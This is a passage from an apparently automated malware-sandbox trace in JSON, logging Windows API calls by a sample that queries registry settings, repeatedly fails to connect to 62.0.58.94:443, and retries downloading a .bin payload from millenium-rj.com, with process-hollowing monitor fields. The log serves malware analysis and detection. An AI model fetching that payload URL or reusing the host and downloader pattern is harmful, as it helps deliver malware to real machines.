"0x000004d0" }, { "name": "ValueName", "value": "Hostname" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "DESKTOP-JQK72EN" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 1406 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x7650cbfc", "parentcaller": "0x7650ca56", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004d0" } ], "repeated": 0, "id": 1407 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "AutoDetect" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "0" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" } ], "repeated": 0, "id": 1408 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "IntranetName" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" } ], "repeated": 0, "id": 1409 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "ProxyBypass" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" } ], "repeated": 0, "id": 1410 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x72dbd5c6", "parentcaller": "0x7272584b", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1411 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x72dbd42e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004d0" } ], "repeated": 0, "id": 1412 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1413 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004d0", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1232" } ], "repeated": 0, "id": 1414 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1415 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1416 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1417 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcac\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1418 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1419 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1420 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004d0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1421 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1422 }, { "timestamp": "2025-02-27 23:35:38,612", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1423 }, { "timestamp": "2025-02-27 23:35:40,894", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1424 }, { "timestamp": "2025-02-27 23:35:40,894", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1232" } ], "repeated": 0, "id": 1425 }, { "timestamp": "2025-02-27 23:35:40,894", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1426 }, { "timestamp": "2025-02-27 23:35:40,894", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0050" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1427 }, { "timestamp": "2025-02-27 23:35:40,894", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1428 }, { "timestamp": "2025-02-27 23:35:40,894", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1429 }, { "timestamp": "2025-02-27 23:35:41,925", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0054", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1430 }, { "timestamp": "2025-02-27 23:35:41,925", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1431 }, { "timestamp": "2025-02-27 23:35:41,925", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0054" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1432 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1433 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004c8", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1224" } ], "repeated": 0, "id": 1434 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1435 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1436 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1437 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcai\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1438 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1439 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1440 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1441 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1442 }, { "timestamp": "2025-02-27 23:35:41,956", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1443 }, { "timestamp": "2025-02-27 23:35:44,316", "thread_id": "11036", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1444 }, { "timestamp": "2025-02-27 23:35:44,316", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" } ], "repeated": 0, "id": 1445 }, { "timestamp": "2025-02-27 23:35:44,316", "thread_id": "11036", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1446 }, { "timestamp": "2025-02-27 23:35:44,316", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0054" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1447 }, { "timestamp": "2025-02-27 23:35:44,316", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1448 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1449 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0058", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1450 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1451 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0058" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1452 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004dc" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1453 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004e4" } ], "repeated": 0, "id": 1454 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004e8" } ], "repeated": 0, "id": 1455 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1456 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004c8" } ], "repeated": 0, "id": 1457 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004d8" } ], "repeated": 0, "id": 1458 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004dc" } ], "repeated": 0, "id": 1459 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004e0" } ], "repeated": 0, "id": 1460 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1461 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004e0", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1248" } ], "repeated": 0, "id": 1462 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1463 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1464 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1465 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcaj\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1466 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1467 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1468 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004e0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1469 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1470 }, { "timestamp": "2025-02-27 23:35:45,331", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1471 }, { "timestamp": "2025-02-27 23:35:47,503", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1472 }, { "timestamp": "2025-02-27 23:35:47,503", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1248" } ], "repeated": 0, "id": 1473 }, { "timestamp": "2025-02-27 23:35:47,503", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1474 }, { "timestamp": "2025-02-27 23:35:47,503", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0058" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1475 }, { "timestamp": "2025-02-27 23:35:47,503", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1476 }, { "timestamp": "2025-02-27 23:35:47,503", "thread_id": "11160", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1477 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc005c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1478 }, { "timestamp": "2025-02-27 23:35:48,519", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", 